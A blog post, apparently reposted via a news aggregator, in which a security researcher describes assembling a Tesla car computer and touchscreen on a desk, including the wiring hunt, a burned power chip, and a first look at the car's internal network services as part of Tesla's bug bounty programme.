This is when I dis­cov­ered that Tesla pub­lishes the wiring Electrical Reference” for all of its cars pub­licly. On their ser­vice web­site, you can look up a spe­cific car model, search for a com­po­nent (such as the dis­play), and it will show you ex­actly how the part should be wired up, what ca­bles/​con­nec­tors are used, and even what the dif­fer­ent pins are re­spon­si­ble for in­side a sin­gle con­nec­tor:

Turns out the dis­play uses a 6-pin ca­ble (2 for 12V and ground, 4 for data) with a spe­cial Rosenberger 99K10D-1D5A5-D con­nec­tor. I soon dis­cov­ered that un­less you are a car man­u­fac­turer or­der­ing in bulk, there is no way you are buy­ing a sin­gle Rosenberger ca­ble like this. No Ebay list­ings, noth­ing on Aliexpress, es­sen­tially no search re­sults at all.

After dig­ging around a bit, I found that this ca­ble is very sim­i­lar to a more widely used au­to­mo­tive ca­ble called LVDS, which is used to trans­fer video in BMW cars. At first sight, the con­nec­tors looked like a per­fect match to my Rosenberger, so I placed an or­der:

The com­puter ar­rived first. To at­tempt to power it on, I looked up which pin of which con­nec­tor I needed to at­tach 12V and ground to us­ing the Tesla schemat­ics & the few pic­tures on­line of peo­ple do­ing the same desk-MCU setup. Since the com­puter in­cluded the shortly cut ca­bles, I was able to strip the rel­e­vant wires and at­tach the power sup­ply’s clips to the right ones:

I saw a cou­ple of red LEDs start flash­ing, and the com­puter started up! Since I had no screen yet, there were not many ways to in­ter­act with the car. Reading @lewurm’s pre­vi­ous re­search on GitHub I knew that, at least in older car ver­sions, there was a net­work in­side the car, with some com­po­nents hav­ing their own web­server. I con­nected an Ethernet ca­ble to the port next to the power con­nec­tor and to my lap­top.

This net­work does not have DHCP, so you have to man­u­ally set your IP ad­dress. The IP you se­lect has to be 192.168.90. X/24, and should be higher than 192.168.90.105 to not con­flict with other hosts on the net­work. On Reddit, I found the con­tents of an older /etc/hosts file from a car which shows the hosts that are nor­mally as­so­ci­ated with spe­cific IPs:

@lewurm’s blog men­tioned that SSH on port :22 and a web­server on :8080 was open on 192.168.90.100, the MCU. Was this still the case on newer mod­els? Yes!

I had al­ready found 2 ser­vices to ex­plore on the MCU:

* An SSH server which states SSH al­lowed: ve­hi­cle parked” - quite funny given the cir­cum­stances

This SSH server re­quires spe­cially signed SSH keys which only Tesla is sup­posed to be able to gen­er­ate.

Interestingly, Tesla of­fers a Root ac­cess pro­gram” on their bug bounty pro­gram. Researchers who find at least one valid rooting” vul­ner­a­bil­ity will re­ceive a per­ma­nent SSH cer­tifi­cate for their own car, al­low­ing them to log in as root and con­tinue their re­search fur­ther. — A nice perk, as it is much eas­ier to find ad­di­tional vul­ner­a­bil­i­ties once you are on the in­side.

* This SSH server re­quires spe­cially signed SSH keys which only Tesla is sup­posed to be able to gen­er­ate.

* Interestingly, Tesla of­fers a Root ac­cess pro­gram” on their bug bounty pro­gram. Researchers who find at least one valid rooting” vul­ner­a­bil­ity will re­ceive a per­ma­nent SSH cer­tifi­cate for their own car, al­low­ing them to log in as root and con­tinue their re­search fur­ther. — A nice perk, as it is much eas­ier to find ad­di­tional vul­ner­a­bil­i­ties once you are on the in­side.

* A REST-like API on :8080 which re­turned a his­tory of tasks”

This ser­vice is called ODIN (On-Board Diagnostic Interface Network), and is in­ten­tion­ally ex­posed to be used by Tesla’s di­ag­nos­tics tool Toolbox”.

* This ser­vice is called ODIN (On-Board Diagnostic Interface Network), and is in­ten­tion­ally ex­posed to be used by Tesla’s di­ag­nos­tics tool Toolbox”.

Around this time, I also re­moved the metal shield­ing to see ex­actly what the boards look like in­side. You can see the two dif­fer­ent boards which were stacked on top of each other:

Once the screen and the BMW LVDS ca­ble ar­rived, it un­for­tu­nately be­came clear that the con­nec­tor is not go­ing to fit. The BMW con­nec­tor was much thicker on the sides and it was not pos­si­ble to plug it into the screen. This led to some su­per sketchy im­pro­vised at­tempts to strip the two orig­i­nal tail” ca­bles from the MCU and the screen and con­nect the in­di­vid­ual wires to­gether. The wires were re­ally sen­si­tive and thin. The setup worked for a cou­ple of sec­onds, but caused wire de­bris to fall on the PCB and short it, burn­ing one of the power con­troller chips:

It was ex­tremely hard to find the name/​model of the chip that got burned, es­pe­cially since part of the text printed on it had be­come un­read­able due to the dam­age. To be able to con­tinue with the pro­ject, I had to or­der a whole other car com­puter.

In the mean­time, my friend Yasser (@n3r0li) some­how pulled off the im­pos­si­ble and iden­ti­fied it as the MAX16932CATIS/V+T” step-down con­troller, re­spon­si­ble for con­vert­ing power down to lower volt­ages. We or­dered the chip and took the board to a lo­cal PCB re­pair shop, where they suc­cess­fully re­placed it and fixed the MCU. Now I had two com­put­ers to work with.

So I re­ally did need that Rosenberger ca­ble, there was no get­ting around it.

After hav­ing no luck find­ing it on­line and even vis­it­ing a Tesla ser­vice cen­ter in London (an odd en­counter, to say the least), I had to ac­cept what I had been try­ing to avoid: buy­ing an en­tire Dashboard Wiring Harness.

Back in the Tesla Electrical Reference, in ad­di­tion to the con­nec­tors, one can find every part num­ber. Looking at the ca­ble which con­nects the MCU to the screen, the num­ber 1067960-XX-E shows. Searching for it on Ebay brings up this mon­stros­ity:

Turns out that ac­tual cars don’t have in­di­vid­ual ca­bles. Instead they have these big looms”, which bun­dle many ca­bles from a nearby area into a sin­gle har­ness. This is the rea­son why I could not find the in­di­vid­ual ca­ble ear­lier. They sim­ply don’t man­u­fac­ture it. Unfortunately I had no other choice but to buy this en­tire loom for 80 USD.

Despite how bulky it was, the loom worked per­fectly. The car booted, the touch screen started up, and I had a work­ing car com­puter on my desk, run­ning the car’s op­er­at­ing sys­tem!

Having the sys­tem run­ning, I can now start play­ing with the user in­ter­face, in­ter­act­ing with the ex­posed net­work in­ter­faces, ex­plor­ing the CAN buses, and per­haps even at­tempt­ing to ex­tract the firmware.

...

Read the original on bugs.xdavidhu.me »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.